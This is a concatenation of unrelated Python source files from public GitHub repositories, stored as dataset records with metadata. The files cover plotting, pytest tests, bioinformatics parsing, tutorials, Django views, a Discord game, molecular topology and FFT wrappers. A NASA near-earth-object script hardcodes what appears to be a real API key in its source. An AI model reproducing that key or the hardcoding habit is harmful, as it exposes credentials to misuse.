np.float64(0)/float(0) gives nan, and float(0)/float(0) gives ZeroDivisionError\n plot(\n ax2b,\n lambda r: np.float64(r[\"posns_evaluated\"]) / float(r[\"batches\"]),\n 6,\n \"evals/batch\",\n )\n\n if alg in [\"astar\", \"beam\", \"hybrid\"]:\n # Only the one line on linear scale, so colour the axis and skip legend\n ax2b.set_ylabel(\"evals/batch\", color=plotting.colors(6))\n ax2b.tick_params(axis=\"y\", colors=plotting.colors(6), which=\"both\")\n legends, labels = [], []\n for col, key in enumerate(\n [\"generated\", \"expanded\", \"pruned\", \"unexplored\", \"merges\"],\n 7, # The starting index, i.e. color, after the lines plotted above\n ):\n plot(ax2, lambda r: float(r[key]), col, \"p_\" + key)\n else:\n assert alg == \"rollout\"\n # Add success rate and alpha to linear axis\n plot(ax2b, lambda r: float(r[\"alpha\"]), 7, \"alpha\")\n plot(ax2b, lambda r: float(r[\"success_rate\"]) * 10, 8, \"success/10\")\n ax2b.set_ylabel(\"e/b, alpha, succ\")\n # Include legends\n legends, labels = ax2b.get_legend_handles_labels()\n\n plt.xlabel(\"Generation\", fontsize=16)\n plt.suptitle(\"Search summary\" + title_suffix)\n # Add the p_* to the legend\n p_legends, p_labels = ax2.get_legend_handles_labels()\n plt.figlegend(\n legends + p_legends,\n labels + p_labels,\n loc=\"lower center\",\n ncol=len(legends + p_legends),\n )\n\n fig.tight_layout(rect=[0.0, 0.05, 1.0, 0.95])\n plt.savefig(outfile)\n\n\ndef plot_search_summary_from_config(config, events):\n plot_search_summary(\n plotting.format_figure_filename(config, \"search_summary.png\"),\n plotting.config_suffix(config),\n events,\n config[\"train_search\"],\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"run_id\",\n type=str,\n help=\"a run ID (e.g., 2019_01_06_13_15_48_13172) or path to a config.json file\",\n )\n args = parser.parse_args()\n\n config = experiment_result.load_config(args.run_id)\n logs = experiment_result.load_events_from_config(config)\n plot_search_summary_from_config(config, logs)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"microsoft/knossos-ksc","sub_path":"rlo/src/rlo/plot_search_summary.py","file_name":"plot_search_summary.py","file_ext":"py","file_size_in_byte":6687,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"26909311065","text":"import pytest\nfrom beginner_task import CsvToJson\n\n\n@pytest.fixture()\ndef instance():\n csvtojson = CsvToJson()\n return csvtojson\n\n\n# test to check if provided file is .csv:\ndef test_Extension(instance):\n csv_file = instance.data_file\n instance.main(csv_file=csv_file)\n if csv_file.lower().endswith('.csv'):\n print(\"Successful\")\n else:\n raise Exception(\"File Provided is not CSV\")\n\n\n# test to check if main function runs properly:\ndef test_function(instance):\n csv_file = instance.data_file\n try:\n instance.main(csv_file=csv_file)\n except NameError:\n print(\"CsvToJson Not Defined\")\n else:\n print(\"Successful!\")\n\n\n\n","repo_name":"akashgarje/d-mart-supplier","sub_path":"TestDmart.py","file_name":"TestDmart.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72211752108","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 28 10:14:08 2019\r\n\r\n@author: fatma\r\n\"\"\"\r\ndef blosum62_matrix():\r\n \r\n with open('blosum62.txt') as matrix_file:\r\n matrix = matrix_file.read()\r\n lines = matrix.strip().split('\\n')\r\n\r\n header = lines.pop(0)\r\n columns = header.split()\r\n matrix = {}\r\n\r\n for row in lines:\r\n entries = row.split()\r\n row_name = entries.pop(0)\r\n matrix[row_name] = {}\r\n for column_name in columns:\r\n matrix[row_name][column_name] = entries.pop(0)\r\n \r\n return(matrix)\r\n","repo_name":"mafattma/Classification-with-Kernel-methods","sub_path":"src/blosum62.py","file_name":"blosum62.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30463204405","text":"\n\n# Enkelt eksempel på bruk av input-funksjon:\n\nnavn = input(\"Hva er navnet ditt?\")\nprint(\"Hei\", navn)\n\n\n# Gjøre om input til et tall:\n\nalder = int(input(\"Hvor gammel er du?\"))\nårstall = 2016 - alder\n\n\n# sette sammen flere strenger til en streng:\n\nfødt_i_årstall = input(\"Ble du født i \" + str(årstall) + \"?\")\nprint(\"Du svarte:\", født_i_årstall)\n","repo_name":"aliccce/ITGKpython","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2769729885","text":"from tkinter import *\n\nwin = Tk()\n\nwin.geometry(\"700x350\")\n\ndef on_click():\n label[\"text\"] = \"Code\"\n b[\"text\"] = \"Congrats! You are now a true programmer\"\n\nlabel = Label(win, text=\"Coffee\",\nfont=('Calibri 15 bold'))\nlabel.pack(pady=20)\n\nb = Button(win, text=\"Click to change Coffee to Code\", command=on_click)\nb.pack(pady=20)\n\nwin.mainloop()","repo_name":"narze/coffee-to-code","sub_path":"Python/malhaar2002.py","file_name":"malhaar2002.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"17734751175","text":"import random\nimport asyncio\nimport json\nimport discord\nimport math\n\ndef decide_playing_order(players: dict):\n l = list(players.items())\n random.shuffle(l)\n while l[0][1]['role'] == 'white':\n random.shuffle(l)\n return dict(l)\n\nasync def eliminate(ctx, vote_outcome, players, players_data, alived_players_data):\n id_ = vote_outcome[0][0]\n index = alived_players_data[id_]['index']\n players_data[id_]['alive'] = False\n await ctx.send(\n f':skull: **{players[index].mention}** is eliminated with **{vote_outcome[0][1]}** votes!')\n return alived_players_data.pop(id_)\n\ndef check_game_over(civilians_alive_count, infiltrator_alive_count):\n \"\"\"\n return a tuple (game_over, winner_team)\n game_over is a boolean (True: Game ended, False: Game continues)\n winner_team represent the winning team, None if no one win in this round\n \"\"\"\n if civilians_alive_count == 1:\n return True, 'Infiltrator'\n elif infiltrator_alive_count == 0:\n return True, 'Civillian'\n else:\n return False, None\n\nasync def handle_guess(self, member):\n def check(message):\n return message.author.id == member.id and isinstance(message.channel, discord.DMChannel)\n\n await member.send(\"**Guess the civilian's word and sent it right here within 15 seconds :stopwatch:**\")\n try:\n msg = await self.bot.wait_for(event='message', timeout=15, check=check)\n except asyncio.TimeoutError:\n await member.send(\":stopwatch: Timeout! Try harder next time :wink:\")\n return False\n else:\n if msg.content.replace(' ', '').lower() == self.c_word.replace(' ', '').lower():\n await member.send(\"**:tada: Congrats! You got it RIGHT!** :white_check_mark::white_check_mark:\")\n return True\n else:\n await member.send(\"**:x: Wrong! Try harder next time :wink:**\")\n return False\n\ndef empty_vote_scheduler_file():\n empty_dict = {}\n with open('./databases/vote.json', 'w') as vote_file:\n json.dump(empty_dict, vote_file, indent=4)\n\n with open('./databases/scheduler.json', 'w') as schedule_file:\n json.dump(empty_dict, schedule_file, indent=4)\n\n# Given a number N, find and return all possible combination (a, b) where a>b and a+b=N\ndef find_possible_combinations(number_of_infiltrators: int) -> list:\n result = []\n for a in range(number_of_infiltrators+1):\n for b in range(a, number_of_infiltrators+1):\n if a + b == number_of_infiltrators:\n result.append((b, a))\n return result\n\ndef get_random_number_of_infiltrators(total_players: int):\n min = math.floor(total_players/4) + 1\n max = math.floor(total_players/2)\n return random.randint(min, max)\n\ndef randomCombinationInfiltrator(total_players):\n number_of_infiltrators = get_random_number_of_infiltrators(total_players)\n possible_combinations = find_possible_combinations(number_of_infiltrators)\n return random.choice(possible_combinations) # returns a tuple (Undercover, Mr.White)\n","repo_name":"wongcheehong/undercover_bot","sub_path":"function/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72280620587","text":"import rx\nfrom rx.subjects import Subject\nasyncio = rx.config['asyncio']\n\n\nclass TCPSubject(Subject):\n def __init__(self):\n super().__init__()\n\n @asyncio.coroutine\n def handle_request(self, reader, writer):\n data = yield from reader.readline()\n message = data.decode()\n addr = writer.get_extra_info('peername')\n print('Received {} from {}'.format(message.strip(), addr))\n self.on_next((message, addr[0]))\n\n print('Send: {}'.format(message.strip()))\n writer.write(data)\n yield from writer.drain()\n\n print('Close the client socket')\n writer.close()\n","repo_name":"geowa4/python3-docker-pex-rxpy-asyncio-experiments","sub_path":"experiment/tcpsubject.py","file_name":"tcpsubject.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"30496237679","text":"class Solution(object):\r\n def getRow(self, rowIndex):\r\n \"\"\"\r\n :type rowIndex: int\r\n :rtype: List[int]\r\n \"\"\"\r\n if rowIndex == 0:\r\n return [1]\r\n elif rowIndex == 1:\r\n return [1, 1]\r\n \r\n prev_row = [1,1]\r\n for i in range(2, rowIndex+2):\r\n cur_row = [1]\r\n for j in range(1, i-1):\r\n cur_row.append(prev_row[j-1] + prev_row[j])\r\n cur_row.append(1)\r\n prev_row = cur_row\r\n return cur_row","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0119_Pascal's_Triangle_II.py","file_name":"0119_Pascal's_Triangle_II.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42548042861","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Count\n\nfrom taggit.models import Tag\n\nfrom .models import *\nfrom .forms import RecipeForm, UserLoginForm\n\n\n# class Index(ListView):\n# model = Recipe\n# template_name = 'recipe/index.html'\n# context_object_name = 'recipe'\n#\n# def get_context_data(self, *, object_list=None, **kwargs):\n# context = super().get_context_data(**kwargs)\n# context['title'] = 'Книга рецептов'\n# return context\n#\n# def get_queryset(self):\n# return Recipe.objects.filter(published=True)\n\n\ndef index(request, tag_id=None, category_slug=None):\n recipe = Recipe.objects.filter(published=True)\n tag = None\n category = None\n\n if tag_id:\n tag = get_object_or_404(Tag, pk=tag_id)\n recipe = recipe.filter(tags__in=[tag])\n\n if category_slug:\n category = get_object_or_404(Category, slug=category_slug)\n recipe = recipe.filter(category__in=[category])\n\n paginator = Paginator(recipe, 9)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # Если номер страницы не INT, то включить 1ю страницу.\n posts = paginator.page(1)\n except EmptyPage:\n # Если номер страницы больше максимального, отобразить последнюю страницу.\n posts = paginator.page(paginator.num_pages)\n\n context = {\n # 'recipe': recipe,\n 'title': 'Книга рецептов',\n 'categories': Category.objects.all(),\n 'page': page,\n 'posts': posts,\n 'tag': tag,\n 'category': category,\n }\n return render(request, 'recipe/recipe/index.html', context=context)\n\n\n# class Cat(ListView):\n# model = Recipe\n# template_name = 'recipe/category.html'\n# context_object_name = 'recipe'\n#\n# def get_queryset(self):\n# return Recipe.objects.filter(category=self.kwargs['category_slug'], published=True)\n\n\ndef recipe_view(request, recipe_slug):\n recipe_full = Recipe.objects.get(slug=recipe_slug)\n\n post_tags_ids = recipe_full.tags.values_list('id', flat=True)\n similar_posts = Recipe.objects.filter(tags__in=post_tags_ids).exclude(id=recipe_full.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-create_at')[:3]\n\n context = {\n 'recipe_full': recipe_full,\n 'similar_posts': similar_posts,\n }\n return render(request, 'recipe/recipe/recipe.html', context=context)\n\n\ndef add_recipe(request):\n if request.method == 'POST':\n form = RecipeForm(request.POST)\n if form.is_valid():\n # recipe = Recipe.objects.create(**form.cleaned_data)\n recipe = form.save()\n return redirect(recipe)\n else:\n form = RecipeForm()\n return render(request, 'recipe/recipe/add_recipe.html', {'form': form})\n\n\ndef about(request):\n return render(request, 'recipe/recipe/about.html')\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, 'Успех!')\n return redirect('home')\n else:\n messages.error(request, 'Неудача!')\n else:\n form = UserCreationForm()\n return render(request, 'recipe/recipe/register.html', {'form': form})\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = UserLoginForm(data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n return redirect('home')\n else:\n form = UserLoginForm()\n return render(request, 'recipe/recipe/login.html', {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect('login')\n\n\nclass Search(ListView):\n template_name = 'recipe/recipe/index.html'\n context_object_name = 'posts'\n paginate_by = 9\n\n def get_queryset(self):\n return Recipe.objects.filter(title__icontains=self.request.GET.get('s'))\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['s'] = f\"s={self.request.GET.get('s')}&\"\n context['title'] = f\"Поиск по запросу: {self.request.GET.get('s')}\"\n return context","repo_name":"kovdmit/recipe-book","sub_path":"recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16167885363","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom os import path\n\n\n#===============================================================================\nclass Section(object):\n\tdef __init__(self, name, content):\n\t\tself.name = name\n\t\tself.content = content\n\t\t\n\tdef __repr__(self):\n\t\treturn(\"<Section %s>\"%self.name)\n\n\tdef pure_content(self): \n\t\t\"\"\" removes empty lines and those starting with # or ; \"\"\"\n\t\treturn(re.sub(\"(?m)^([;#].*|\\s*)\\n\", \"\", self.content))\n\t\t\n#===============================================================================\nclass Moleculetype(object):\n\tdef __init__(self, top, section):\n\t\tself.top = top\n\t\tself.section = section\n\t\tself.num_atoms = 0\n\n\tdef name(self):\n\t\treturn(self.section.pure_content().split()[0])\n\n\tdef __repr__(self):\n\t\treturn(\"<Moleculetype %s>\"%self.name())\n\n\tdef add2section(self, sectionname, newcontent):\n\t\ti = self.top.sections.index(self.section)\n\t\tfor s in self.top.sections[i+1:]:\n\t\t\tif(s.name == sectionname):\n\t\t\t\ts.content += newcontent\n\t\t\t\treturn\n\t\t\tif(s.name == \"moleculetype\"):\n\t\t\t\tbreak\n\t\t\t\t\n\t\t#section not found - create a new one\n\t\tnew_section = Section(sectionname, newcontent)\n\t\tself.top.sections.insert(i+2, new_section) #add after atoms-section\n\t\t#raise(Exception(\"Section with name: %s not found.\"%sectionname))\n\t\t\n#===============================================================================\nclass Topology(object):\n\tdef __init__(self, filename):\n\t\tself.moleculetypes = {}\n\t\tself.molecules = []\t\t\n\t\tself.sections = []\n\t\t\n\t \t#TODO: run through cpp to resolve #include, #IFDEF etc\n\t \t#alternative: grompp -pp \n\t\trawdata = open(filename).read()\n\t\tdef loadfile(m):\n\t\t\tfn = path.join(path.basename(filename), m.group(1))\n\t\t\tif(path.exists(fn)):\n\t\t\t\treturn(open(fn).read())\n\t\t\treturn('#include \"%s\"\\n'%m.group(1))\n\n\t\trawdata = re.sub('#include\\s+\"([^\"]*)\"\\s+', loadfile , rawdata) #resolve includes\n\n\t\tparts = re.split(\"\\[\\s*(\\w*)\\s*\\]\", rawdata)\n\t\tself.header = parts.pop(0)\n\t\tassert(len(parts)%2 == 0) #expecting section-name / section-content pairs\n\t\t\n\t\twhile(len(parts) > 0):\n\t\t\ts = Section(name=parts.pop(0), content=parts.pop(0))\n\t\t\tself.sections.append(s) \n\t\t\n\t\tcurrent_mt = None\n\t\tfor s in self.sections:\n\t\t\tif(s.name == \"moleculetype\"):\n\t\t\t\tname = s.pure_content().split()[0]\n\t\t\t\tcurrent_mt = Moleculetype(self, s)\n\t\t\t\tself.moleculetypes[name] = current_mt\n\t\t\telif(s.name == \"atoms\"):\n\t\t\t\tcurrent_mt.num_atoms += s.pure_content().count(\"\\n\")\n\t\t\telif(s.name == \"molecules\"):\n\t\t\t\tself.molecules += [x.split() for x in s.pure_content().split(\"\\n\") if len(x.strip())>0]\n\n\n\tdef write(self, filename):\n\t\tf = open(filename, \"w\")\n\t\tf.write(self.header)\n\t\tfor s in self.sections:\n\t\t\tf.write(\"[ %s ]\\n\"%s.name)\n\t\t\tf.write(s.content+\"\\n\")\n\t\tf.close()\n\t\n\tdef atomnum2molnum(self, abs_atom_num):\n\t\t\"\"\" Converts abs. atom number to abs. molecule number \"\"\"\n\t\tabs_mol_counter = 1\n\t\tabs_atom_counter = 1\n\t\tfor (name, num) in self.molecules:\n\t\t\tfor dummy in range(int(num)):\n\t\t\t\tabs_atom_counter += self.moleculetypes[name].num_atoms\n\t\t\t\tabs_mol_counter += 1\n\t\t\t\tif(abs_atom_num < abs_atom_counter):\n\t\t\t\t\treturn(abs_mol_counter -1)\n\t\traise(Exception(\"Absolute Atom Number too hight: %d\"%abs_atom_num))\n\n\n\tdef molnum2moltype(self, abs_mol_num):\n\t\tabs_mol_counter = 0\n\t\tfor (name, num) in self.molecules:\n\t\t\tabs_mol_counter += int(num)\n\t\t\tif(abs_mol_num <= abs_mol_counter):\n\t\t\t\treturn(self.moleculetypes[name])\n\t\traise(Exception(\"Absolute Molecule Number too hight: %d\"%abs_mol_num))\n\n\tdef abs2rel_atomnum(self, abs_atom_num):\n\t\t#TODO: more testing\n\t\tfor (name, num) in self.molecules:\n\t\t\tmol_size = self.moleculetypes[name].num_atoms\n\t\t\tif(abs_atom_num > mol_size * num):\n\t\t\t\tabs_atom_num -= mol_size * num\n\t\t\telif(abs_atom_num == mol_size):\n\t\t\t\treturn(mol_size)\n\t\t\telse:\n\t\t\t\treturn(abs_atom_num % mol_size)\n\n\t\traise(Exception(\"Absolute Atom Number too hight: %d\"%abs_atom_num))\n\n#\tdef atomnum2moltype(self, abs_atom_num):\n#\t\tmolnum = self.atomnum2molnum(abs_atom_num)\n#\t\treturn(self.molnum2moltype(molnum))\n\n#===============================================================================\n#EOF\n","repo_name":"CMD-at-ZIB/ZIBMolPy","sub_path":"ZIBMolPy_package/ZIBMolPy/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"1765647037","text":"# Attributs d'instance / attributs statiques (ou attributs de classe synonyme)\n\n# Attributs d'instances : chaque instance a sa propre valeur\n# Attributs statiques : partagé par toutes les instances\n\n# on souhaite conserver le nombre de personnages instanciés dans \n# l'appli\n\nclass Personnage:\n total_personnage = 0 # valeur initialisée lors du chargement\n # de la classe en mémoire\n def __init__(self, nom = \"John\", arme = \"Epée\", pdv = 100):\n self.nom = nom \n self.arme = arme\n self.pdv = pdv\n Personnage.total_personnage += 1\n\n # les méthodes ou attributs commencant et terminant par des _ _ \n # sont appelées soit spéciales soit magiques\n # il existe une méthode spéciale, __del__ qui est appelée par le ramasse miettes\n # juste avant de libérer l'espace mémoire associé à un objet\n # 1 argument obligatoire, qui correspond à l'instance qui va être supprimée\n # self\n def __del__(self):\n Personnage.total_personnage -= 1\n\n # méthode d'instance : méthode qui effectue un traitement avec une instance\n # méthode propre à chaque instance\n # premier argument obligatoire : self. Il correspond à l'instance qui fait\n # appel à la méthode\n def combattre(self, degat = 10):\n self.pdv -= degat\n print(f\"Combat terminé. Il reste {self.pdv} pdv au personnage {self.nom}\")\n\n # méthode de classe : méthode partagée par toutes les instances\n # dont le comportement ne dépend pas d'une instance en particulier\n # on utilise un décorateur : \n # une spécification à la ligne précédent la signature de la méthode\n # un premier argument obligatoire : cls pour référence à la classe\n @classmethod\n def afficher_total(cls): # cls sera Personnage\n print(f\"Il y a un total de {cls.total_personnage} personnages\")\n\n # méthode statique : comme une méthode de classe, sauf que l'argument cls\n # est inutile et donc pas d'argument obligatoire\n @staticmethod\n def dire_bonjour():\n print(\"Bonjour\")\n\n # FIN DU BLOC CLASS\n\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np1 = Personnage()\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np2 = Personnage(\"Maude\",\"Hache\",150)\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np1 = Personnage(\"Cyril\",\"Dague\",50)\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\n\n# John n'est plus référencé par aucune variable : on ne peut plus y avoir accès\n# il ne sert plus à rien dans le programme\n# un ramasse miettes vient régulièrement libérer l'espace mémoire associé\n# aux objets qui ne sont plus référencés\n\np1.combattre()\np1.combattre(25)\n\nPersonnage.afficher_total()\nPersonnage.dire_bonjour()\n","repo_name":"SylvainJanet/FormationPythonInitiationApprofondissement20221114","sub_path":"17_classes/classes_2.py","file_name":"classes_2.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34657070432","text":"# Let's build a python application to pull some info on Near Earth Objects and give it back to people in interesting ways\n\nimport requests\nimport json\nimport datetime\nimport random\n\n\n# TODO: Build a method to pull the feed data based on user input start/end dates\n\n# API Endpoint\n\napi_url = \"https://api.nasa.gov/neo/rest/v1/feed/today?detailed=true&api_key=\"\napiKey = \"13L6o25sYaUm7Ac1Op2e09FrWudmH6N0rRhVBoCx\"\n\n# Get and return data\nresponse = requests.get(api_url + apiKey)\ndata = response.text\nparsed = json.loads(data)\n\n# Set variables based on data\n# Sets a variable to dynamically pull today's date and then turns it into a string\ntodays_date = str(datetime.date.today())\n\n# Sets \"neos\" as a variable which is the entirety of the API data along with some other global variables\nneos = parsed[\"near_earth_objects\"][todays_date]\ntotal_neos_today = parsed[\"element_count\"]\nlength_of_armadillo = 1.5\nlength_of_delorean = 4.2\ni = random.randint(1,5)\n\n# max_diameter = neos[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_max\"]\n\n# TODO: Parse the data to return data for...\n\n# TODO: ...Furthest NEO\n\n\n# Function to calculate the total number of potentially hazardous asteriods\n\ndef get_total_phas(neos):\n total_phas = 0\n for pha in neos:\n if pha[\"is_potentially_hazardous_asteroid\"] is True:\n total_phas = total_phas + 1\n pass\n return(total_phas)\n\n# Write a function to return the largest NEO in diameter\ndef get_largest_neo(neos):\n largest = None\n for diameter in neos:\n max_diameter = round(diameter[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_max\"])\n if largest is None:\n largest = max_diameter \n if largest > max_diameter:\n pass\n else:\n largest = max_diameter\n name = diameter[\"name\"]\n return(largest, name)\n\n# TODO Function to get the smallest NEO\n\ndef get_smallest_neo(neos):\n smallest = None\n for diameter in neos:\n min_diameter = round(diameter[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_min\"])\n if smallest is None:\n smallest = min_diameter\n if smallest < min_diameter:\n pass\n else:\n smallest = min_diameter\n name = diameter[\"name\"]\n return(smallest, name)\n\n# Function to get the fastest NEO\n\ndef get_fastest_neo(neos):\n velocity = None\n for speed in neos:\n km_per_second = speed[\"close_approach_data\"][0][\"relative_velocity\"][\"kilometers_per_second\"]\n km_per_second = float(km_per_second)\n if velocity is None:\n velocity = km_per_second\n if velocity > km_per_second:\n pass\n else:\n velocity = km_per_second\n name = speed[\"name\"]\n return(round(velocity), name)\n\n# Function to generate a random mild insult to insert in the greeting\n\ndef generate_random_insult(i):\n if i == 1:\n insult = \"worry wart\"\n elif i == 2:\n insult = \"high level hypochondriac\"\n elif i == 3:\n insult = \"inquisitive interstellar instigator\"\n elif i == 4:\n insult = \"celestial conjurer of ceaseless candor\"\n elif i == 5:\n insult = \"laser-brained luddite\"\n return(insult)\n\n\n\n\n# TODO Write a function to return these calculations\n# Declare variables for other units of measure and do the math\n\nlargest_diameter_in_armadillos = round(get_largest_neo(neos)[0] / length_of_armadillo)\nlargest_diameter_in_deloreans = round(get_largest_neo(neos)[0] / length_of_delorean)\nsmallest_diameter_in_armadillos = round(get_smallest_neo(neos)[0] / length_of_armadillo)\nsmallest_diameter_in_deloreans = round(get_smallest_neo(neos)[0] / length_of_delorean)\n\n\n# All the \"print\" statements\n\n# Define the \"main\" function\n\ndef asteroidvariables(x): \n \n if x.lower() == \"fastest\":\n asteroid = \"{} is the fastest NEO today, racing towards somwhere at a speed of {} kilometers per second.\".format(get_fastest_neo(neos)[1], get_fastest_neo(neos)[0])\n elif x.lower() == \"largest\":\n asteroid = \"{} is the largest NEO today at a whopping {} meters in diameter! \\nThat means it's {} armadillos OR {} Deloreans in diameter!\".format(get_largest_neo(neos)[1], get_largest_neo(neos)[0], largest_diameter_in_armadillos, largest_diameter_in_deloreans)\n elif x.lower() == \"smallest\":\n asteroid = \"{} is the smallest NEO today. It checks in at a paultry {} meters in diameter. \\nThat means it's only {} armadillos OR {} Deloreans in diameter!\".format(get_smallest_neo(neos)[1], get_smallest_neo(neos)[0], smallest_diameter_in_armadillos, smallest_diameter_in_deloreans)\n else:\n print(\"\\nOkay, you silly trickster. You and both know that {} is not any of the things I said you could ask for. \\nHow's about we try that again?\".format(x))\n x = input(\"Try fastest, largest, or smallest.\\n\\t> \")\n return asteroidvariables(x)\n\n return asteroid\n\ndef all_done():\n finished = input(\"\\nWell now aren't we all more informed? \\nDid you want to know anything else today? (Yes/No): \")\n if finished.lower() == \"yes\":\n main()\n elif finished.lower() == \"no\":\n print(\"Okay then. I hope you enjoyed learning about whether or not we're all gonna die today. Come back anytime!\")\n else:\n print(\"Ummm...it was a yes or no question friend. \\nLast time I checked, {} is not yes OR no. Let's try it again, shall we?\".format(finished))\n all_done()\n\ndef main():\n print(\"Well hello you {}! Since you asked, there are {} Near Earth Objects on close approach today. \\nNever fear, though, only {} of them are potentially hazardous. Wait, {} of them are potentially hazardous?!!? \\nEverybody run for your lives!!!! \".format(generate_random_insult(i), total_neos_today, get_total_phas(neos), get_total_phas(neos)))\n print(\"\\nWell, since we're here anyway...\")\n x = input(\"So, do you want to know the fastest, largest, or smallest world ending near Earth object?\\n\\t> \")\n asteroidresult = asteroidvariables(x)\n print(asteroidresult)\n return all_done()\n\nmain()\n\n\n\n# print(\"You might ask, 'Are we in danger?' and the answer would be...not at all! Although today is the date of close approach to Earth, it's going to pass at a comfortable {} Kilometers from our planet. You can now exhale.\".format(close_approach_distance))\n\n# print (max_diameter)\n\n# pass\n \n# largest = neo(max_diameter)\n# return largest\n\n# print find_largest()\n\n\n# TODO: ...Fastest NEO\n\n# TODO: Any NEO classified as PHA (potentially hazardous)","repo_name":"andrheau/nasaNEO","sub_path":"Testpage.py","file_name":"Testpage.py","file_ext":"py","file_size_in_byte":6549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23399334415","text":"# by TR\n\nimport os\nimport fftw3\nfrom sito.data import FFTW3_WISDOM_FILE\n\n_plan = None\n_plan2 = None\n\nUSE_OLD_PLAN = False\n\n\nclass __WisdomHandler(object):\n wisdomfile = FFTW3_WISDOM_FILE\n\n def __init__(self):\n if os.path.isfile(self.wisdomfile):\n fftw3.import_wisdom_from_file(self.wisdomfile)\n\n def remove(self):\n if os.path.isfile(self.wisdomfile):\n os.remove(self.wisdomfile)\n\n def forget(self):\n fftw3.forget_wisdom()\n\n def setUseOldPlan(self, val):\n \"\"\" val 1 == True, 2 = False \"\"\"\n global USE_OLD_PLAN\n USE_OLD_PLAN = val\n\n def __del__(self):\n try:\n fftw3.export_wisdom_to_file(self.wisdomfile)\n except TypeError:\n pass\n\nwisdom = __WisdomHandler()\n\n\ndef fft(data, nfft=None, in_place=False, use_old_plan=True, **kwargs_in):\n global _plan\n if USE_OLD_PLAN:\n use_old_plan = (USE_OLD_PLAN == 1)\n# print('USE OLD PLAN %s' % str(use_old_plan))\n kwargs = dict(flags=['measure'])\n kwargs.update(kwargs_in)\n if nfft == None:\n nfft = len(data)\n if _plan is None or (use_old_plan and nfft != len(_plan.inarray)):\n use_old_plan = False\n if not use_old_plan:\n input_ = fftw3.create_aligned_array(nfft)\n if in_place:\n output = None\n else:\n output = fftw3.create_aligned_array(nfft)\n _plan = fftw3.Plan(input_, output, **kwargs)\n _plan.inarray[:len(data)] = data\n _plan.inarray[len(data):] = 0\n _plan.outarray[:] = 0\n _plan()\n if _plan.outarray is None:\n ret = _plan.inarray\n else:\n ret = _plan.outarray\n return ret\n\n\ndef ifft(data, nfft=None, in_place=False, use_old_plan=True, **kwargs_in):\n global _plan2\n if USE_OLD_PLAN:\n use_old_plan = (USE_OLD_PLAN == 1)\n kwargs = dict(direction='backward', flags=['measure'])\n kwargs.update(kwargs_in)\n if nfft == None:\n nfft = len(data)\n if _plan2 is None or(use_old_plan and nfft != len(_plan2.inarray)):\n use_old_plan = False\n if not use_old_plan:\n input_ = fftw3.create_aligned_array(nfft)\n if in_place:\n output = None\n else:\n output = fftw3.create_aligned_array(nfft)\n _plan2 = fftw3.Plan(input_, output, **kwargs)\n _plan2.inarray[:len(data)] = data\n _plan2.inarray[len(data):] = 0\n _plan2()\n if _plan2.outarray is None:\n ret = _plan2.inarray\n else:\n ret = _plan2.outarray\n return ret / nfft\n","repo_name":"trichter/sito","sub_path":"util/fftw3_be.py","file_name":"fftw3_be.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"37225630379","text":"\"\"\"\nModels module for Alien Invaders\n\nThis module contains the model classes for the Alien Invaders game. Anything\nthat you interact with on the screen is model: the ship, the laser bolts, and\nthe aliens.\n\nJust because something is a model does not mean there has to be a special\nclass for it. Unless you 